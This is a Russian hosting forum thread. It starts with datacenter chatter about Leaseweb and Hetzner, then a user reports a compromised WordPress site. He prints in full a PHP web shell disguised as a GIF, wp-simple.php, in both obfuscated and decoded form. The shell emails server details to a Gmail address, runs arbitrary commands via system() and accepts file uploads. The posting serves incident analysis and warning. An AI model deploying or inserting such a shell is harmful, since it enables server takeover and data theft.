root.serverside.ru

iHead:
параллельное программирование рулит. вот только в PHP оно в зачаточном состоянии. несколько лет назад видел реализацию многопоточности в PHP через сокеты.

sdrc:
root.serverside.ru, о, я смотрю тут есть и жители NL?
Тогда реклама leaseweb.nl как одного из лучших и надежных ДЦ Европы :D
Держите в нем сервера свои в Гарлеме? of ben je gewoon reseller van leaseweb?

Вчера обсуждал по телефону с ними пару вопросов, попался очень разговорчивый сотрудник, вылил инфы которую и не спрашивал но очень было приятно узнать :)
И начал рассказывать о том, как у них выкуплен был ДЦ в Франкфурте и говорить, что раньше был не фонтан он, а после того как стал их ним, то стал вообще сказочным =)

unihost:
с каких ето пор сервер в hetzner-е стал считаться хорошим?
у хостера сервер должен быть всегда гдето рядом. Чтоб не ждать по пару дней пока поддержка соизволить перегруз сервера сделать

fsou1:
Подробностей никаких.

Отправили пример письма, то что их кол-во 30.000 и 100 Мб логов.

Спасибо за ссылку, сейчас попробую воспользоваться.

---------- Добавлено 26.10.2012 в 15:50 ----------

Не успешно =\ Ничего толком не нашлось

---------- Добавлено 26.10.2012 в 16:12 ----------

Благодаря сканированию на вирусы, встроенному в cpanel, удалось найти 3 файла в каталогах вордпресс:

/site.ru/o.php
/site.ru/wp-includes/wp-simple.php

которые, вероятно, и стали причиной рассылки. Вот только вопрос, как теперь определить, откуда они взялись? =\

---------- Добавлено 26.10.2012 в 16:49 ----------

Поступило продолжение.

В файле /site.ru/wp-includes/wp-simple.php находится следующее содержимое:

GIF89a
?
??????????!??
????,????
?
??D
?;?<?php



session_start();



error_reporting(0);



$string = 'rUh6QuNTEP5cpPsPyzYnJzpjoEWlE8ToKJgStRAaJ/0CyNrYm3EPe3rtrsmliP/emV07L8cdpdIhUjgzzzMvz4wnXKlPxYqXhTJPztoHneNqO29X2rtPeGHarTgKo6g/uL71Juwze/DuO52fnt7ttB6FFiYpKnZVQA6A1E3wCTwibvhqOLyll6PRWnw5iFP0Ht1Pft5lD8O/xm40isfDvgNZimcJCMpFU5ZZzggwa2/IncTQyKcI03nK84OUA/STkCKeTpUeGuO8Vbm3qn8F7JCnluZWpYRMT/jo9CKMrwbnIQQYXFzQ4+dqOzzT/BXUNYB5d65XrgLIOC+0mSwly2x71ZHn/sen5+dQkKnumT+YT06Q75GG4dVgFGGQZSayNmi9w0OYAuanGU39pMjpHqFJKbpUL5kWGfkNx8IkmRtGHmi7jUmgTdPOnezfkIirVI6F1F3cVgLWfp0GzFqt1En+b+z1lNdvvUB8+GBIEtNpszq/h6NbL8kKyWR6Y3hnRKmEYu6BF50N+zej+KL/dGt9bRVtaRdFro0gwRpoPjgbX4XXo2s4GIy8e59pF+W+kFZJARSftcjLjPvlvMQtRNzJ7PLtERew4xr4gStn9KYVOmUrBKBxXhDaM8Jx/HEs/5DFT5J9EtnaVjTnTNbrOmJiouwHu6l20wJeNi3+4cEvJCkymNrPH+0fAEKov8rt015qsiK3wBhKMPSAtqkPrcZgAH2MNbY7Pu28NccYCNBZJdLAU8qX8AgRSSl8V3N45+x453NMYsqHUISEFMcaSmmkne0w01cmUxSSlAtVU2PHklLq3rcEWmEjW0igjUVyodvo3/O6nl1V69pSX8alaGj2D9GhuKmUJHXxAdxZ+HbDYbe9tn8rxd3d/8kB6O8nqROhcR5VpmWS4zkBpWLwvhJzNQgoPWxd0LMiz5lZGwF7T5aVIXNM8oAa/sVDghoHNMlGuu2NqlYu1n4Xh5JUlkj2+wPgu0vZiWq8XSmHAdkQbJUZRDJyLGE/coY1lTftYDf/0cK4zAqWkguRZNtTF9EvupmLNOWyrkm72rcARuDXYdxa/FfrnB9dtEqruOYLyz4im1J5xFQ1Hfvw1zqP5At8oCTJmNaBblsESnHtoxOz0tY1vCXvxolSxWE9VGGOeXIZqcB4X67fgd2WraPh1OUA6ck67ETGKxzdbY0k3j3gLMjubl488thS53aMgPY3KSYvcFSDy7uqxrd26m9+VSjs1t2RcyvgSpKnaxeeiTvIccsfSFbCtSYGWf7X4eBrHZ0TbVme7dv2T+Rt6RuV4R2xktXOPLW/XMB3QUXMvwh6NPyyLLXhubdEYa9HfPMK4rYwxZnbFIwMG6eDw4OD91EVC3xtYvEuRxuTatb0YcPfjNl6ZWA7/wI=';



eval(gzinflate(str_rot13(base64_decode($string))));



?>

которое при расшифровке превращается в:

error_reporting(0);

if (!isset($_SESSION['bajak']))	{

$visitcount = 0;

$web = $_SERVER["HTTP_HOST"];

$inj = $_SERVER["REQUEST_URI"];

$body = "ada yang inject \n$web$inj";

$safem0de = @ini_get('safe_mode');

if (!$safem0de) {$security= "SAFE_MODE = OFF";}

else {$security= "SAFE_MODE = ON";};

$serper=gethostbyname($_SERVER['SERVER_ADDR']);

$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);

mail("injectortarget@gmail.com", "$body","Hasil Bajakan http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor");

$_SESSION['bajak'] = 0;

}

else {$_SESSION['bajak']++;};

if(isset($_GET['clone'])){

$source = $_SERVER['SCRIPT_FILENAME'];

$desti =$_SERVER['DOCUMENT_ROOT']."/wp-includes/wp-simple.php";

rename($source, $desti);

}

$safem0de = @ini_get('safe_mode');

if (!$safem0de) {$security= "SAFE_MODE : OFF";}

else {$security= "SAFE_MODE : ON";}

echo "<title>UnKnown - Simple Shell</title><br><br>";

echo "<font size=2 color=#888888><b>".$security."</b><br>";

$cur_user="(".get_current_user().")";

echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";

echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";

function pwd() {

$cwd = getcwd();

if($u=strrpos($cwd,'/')){

if($u!=strlen($cwd)-1){

return $cwd.'/';}

else{return $cwd;};

}

elseif($u=strrpos($cwd,'\\')){

if($u!=strlen($cwd)-1){

return $cwd.'\\';}

else{return $cwd;};

};

}

echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';

echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';

if(isset($_POST['submit'])){

$uploaddir = pwd();

if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};

move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);

if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){

echo "Upload Failed";

} else { echo "Upload Success to ".$uploaddir.$name." :D "; }

}

if(isset($_POST['command'])){

$cmd = $_POST['cmd'];

if(function_exists('system')){

echo "<pre>";

echo "<textarea name=cmd cols=100% rows=10%>";

system($cmd);

echo "</textarea>";

echo "</pre>";

}

}

Таким образом, на первый взгляд, индонезийский друг получает доступ к серверу и имеет возможность загружать свои файлы.

Так что, советую Вам провериться на наличие таких файлов в директории вордпресса.

Вопрос в том, откуда взялись эти wp-simple.php файлы =\\